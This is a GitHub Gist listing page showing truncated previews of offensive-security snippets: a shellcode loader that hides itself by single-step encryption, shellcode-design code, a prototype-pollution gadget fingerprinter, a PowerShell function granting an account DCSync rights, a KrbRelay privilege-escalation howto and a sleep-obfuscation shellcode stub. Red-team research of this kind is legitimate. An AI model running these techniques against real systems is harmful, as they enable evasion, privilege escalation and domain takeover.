Skip to content

Instantly share code, notes, and snippets.

View klezVirus's full-sized avatar

klezVirus

1.4k followers · 33 following
View GitHub Profile
@nullenc0de
nullenc0de / apk_params.txt
Last active March 23, 2022 20:49
MD
TermUrl
a
adjust_campaign
alternatives
amount
app
app_id
appname
avoid
@jackullrich
jackullrich / mainc.c
Last active May 23, 2025 21:29
Single Step Encryption/Decryption
#include <Windows.h>
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;
@aaaddress1
aaaddress1 / memBruteforce.cpp
Last active February 20, 2024 11:16
Windows 32-bit Shellcode Design without TEB & fs:30h
// memBruteforce.cpp by [email protected]
// brute search loaded moudules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)
bool isMemExist(size_t addr) {
int retv;
__asm {
@renniepak
renniepak / fingerprint.js
Created December 2, 2021 12:30
Script to fingerprint Script Gadgets to use to exploit Prototype Pollution. Updated version. Original Creator: Nikita Stupin @_nikitastupin
(() => {
let gadgets = [];
if (typeof _satellite !== 'undefined') {
gadgets.push('Adobe Dynamic Tag Management');
}
if (typeof BOOMR !== 'undefined') {
gadgets.push('Akamai Boomerang');
}
@veil-ivy
veil-ivy / block_create_process.cpp
Created February 22, 2022 22:15
#include <ntddk.h>
#define BLOCK_PROCESS "notepad.exe"
static OB_CALLBACK_REGISTRATION obcallback_registration;
static OB_OPERATION_REGISTRATION oboperation_callback;
#define PROCESS_CREATE_THREAD (0x0002)
#define PROCESS_CREATE_PROCESS (0x0080)
#define PROCESS_TERMINATE (0x0001)
#define PROCESS_VM_WRITE (0x0020)
#define PROCESS_VM_READ (0x0010)
#define PROCESS_VM_OPERATION (0x0008)
@jfmaes
jfmaes / Invoke-SyncMeUp.ps1
Created February 26, 2022 10:28
Invoke-SyncMeUp.ps1
function Invoke-SyncMeUp{
[CmdletBinding()]
Param (
[Parameter(Mandatory=$True)]
[string]$AccountName
)
$dse = [ADSI]"LDAP://Rootdse"
$namingcontext = $dse.defaultNamingContext
echo "Giving $AccountName DCSync rights"
dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes"
@tothi
tothi / krbrelay_privesc_howto.md
Last active April 23, 2025 01:59
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@z0rs
z0rs / Red-Teaming-tool.md
Last active October 17, 2025 19:50
@susMdT
susMdT / shitcode.c
Last active December 2, 2024 04:25
hahaha da shellcode go brrrr
#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>
SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)
{
@Huntinex
Huntinex / report.py
Last active March 21, 2025 10:33
Automatic bug bounty report generator
import poe, sys
client = poe.Client("<POE_API_KEY_HERE>")
title=sys.argv[1]
path=sys.argv[2]
more=""
if len(sys.argv) > 3:
more="\" and here is more information: "+sys.argv[3]
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+"""